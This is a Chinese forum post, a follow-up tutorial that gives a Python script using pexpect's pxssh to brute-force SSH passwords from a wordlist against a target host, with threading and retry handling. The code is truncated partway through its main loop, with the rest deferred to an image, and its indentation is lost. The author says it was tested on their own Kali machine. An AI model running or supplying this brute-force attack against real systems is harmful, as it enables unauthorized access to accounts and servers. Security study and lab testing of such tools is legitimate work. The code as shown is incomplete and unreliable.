【初体验】用pxssh暴力破解ssh密码(续)

小新   ·   发表于 3个月前   ·   编程代码
【用Pxssh暴力破解SSH密码(续)】

接上篇
# coding=utf-8
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections = 5
# 定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0def connect(host, user, password, release):
global Found
global Fails

try:
s = pxssh.pxssh()
# 利用pxssh类的login()方法进行ssh登录
s.login(host, user, password)
print '[+] Password is: ' + password
Found = True
except Exception as e:
# SSH服务器可能被大量的连接刷爆,等待一会再连接
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
# 递归调用的connect(),不可释放锁
connect(host, user, password, False)
# 显示pxssh命令提示符提取困难,等待一会再连接
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
# 递归调用的connect(),不可释放锁
connect(host, user, password, False)
finally:
if release:
# 释放锁
connection_lock.release()

def main():
parser = optparse.OptionParser('usage % prog'+'-H -u -f ')
parser.add_option('-H', dest='host', type='string', help='specify target host')
parser.add_option('-u', dest='username', type='string', help='target username')
parser.add_option('-f', dest='file', type='string', help='specify password file')
(options, args) = parser.parse_args()

if (options.host == None) | (options.username == None) | (options.file == None):
print
parser.usage
exit(0)

host = options.host
username = options.username
file = options.file

fn = open(file, 'r')
for line in fn.readlines():

if Found:
print '[*] Exiting: Password Found'
exit(0)

if Fails > 5:
print '[!] Exiting: Too Many Socket Timeouts'
exit(0)

(字数上限了,具体看图三)
[玫瑰]测试: 这里破解的是kalilinux本机的ssh

教程搬砖于网络,侵权立删[玫瑰]

1 Reply   |  Until 2个月前 | 1273 View

CLassder
发表于 3个月前

你直接发文件会更好

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content